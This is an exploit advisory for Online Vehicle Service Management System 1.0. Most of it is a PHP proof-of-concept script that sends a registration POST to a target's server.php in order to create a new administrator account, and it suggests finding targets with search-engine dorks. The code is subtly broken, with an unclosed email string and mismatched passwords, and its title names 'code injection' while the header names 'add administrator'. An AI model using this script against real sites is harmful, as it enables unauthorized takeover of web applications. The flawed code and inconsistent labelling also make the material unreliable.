=============================================================================================================================================
| # Title Online Vehicle Service Management System 1.0 Add Administrator
=============================================================================================================================================
| # Title : Online Vehicle Service Management System 1.0 Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://www.kashipara.com/project/download/project2/user/2023/202303/kashipara.com_vehicle-service-mangement-.zip |
=============================================================================================================================================
POC :
[+] Dorking ?n Google Or Other Search Enggine.
[+] Exploitation allows adding a new admin .
[+] save code as poc.php .
[+] USage : cmd => c:\www\test\php poc.php target.dz
[+] PayLoad :
<?php
function add_admin_user($website) {
$post_fields = array(
'reg_user' => '',
'username' => 'indoushka',
'email' => '
'password_1' => '161286@S@m!a',
'password_2' => '!N0vIs',
'qty' => '1'
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$website/server.php");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
echo "(+) Admin Add Successfully...\n";
}
if ($argc != 2) {
echo "(+) Usage: php " . $argv[0] . " <website URL>\n";
echo "(+) Example: php " . $argv[0] . " http://example.com\n";
exit(-1);
}
$website = $argv[1];
add_admin_user($website);
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================